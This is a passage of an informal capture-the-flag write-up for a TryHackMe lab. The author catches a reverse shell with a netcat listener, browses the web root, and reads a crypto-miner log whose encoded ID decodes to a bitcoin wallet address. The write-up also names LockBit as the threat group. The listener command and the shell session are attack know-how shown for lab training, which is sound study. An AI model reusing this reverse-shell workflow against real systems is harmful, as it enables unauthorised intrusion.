└─$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.152.127 48898
bash: cannot set terminal process group (1285): Inappropriate ioctl for device
bash: no job control in this shell
apache@tryhackme:/data/www/default$ ls
ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.phpnow we are inside the location :
apache@tryhackme:/lib/NetworkManager$ ls
ls
VPN
conf.d
dispatcher.d
inet.conf
nm-dhcp-helper
nm-dispatcher
nm-iface-helper
nm-inet-dialog
nm-initrd-generator
nm-openvpn-auth-dialog
nm-openvpn-service
nm-openvpn-service-openvpn-helper
nm-pptp-auth-dialog
nm-pptp-service
system-connectionsand inet.conf is the log file
Question 05
What is the wallet address of the miner instance?
apache@tryhackme:/lib/NetworkManager$ head inet.conf
head inet.conf
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
2024-04-08 10:46:08,745 [*] Miner()
2024-04-08 10:46:08,745 [*] Bitcoin Miner Thread Started
2024-04-08 10:46:08,745 [*] Status: Mining!
2024-04-08 10:46:10,747 [*] Miner()
2024-04-08 10:46:12,748 [*] Miner()
2024-04-08 10:46:14,751 [*] Miner()
2024-04-08 10:46:16,753 [*] Miner()after pasting this on cybercheff we decrypted it : bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
in this if you watch closely, the same wallet address is repeating bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa bc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
so first one is the correct one as per the standard bitcoin wallet address.
Question 06
so in next question actually i had to go through with a writeup and found that the threat group is “Lockbit”
DONE
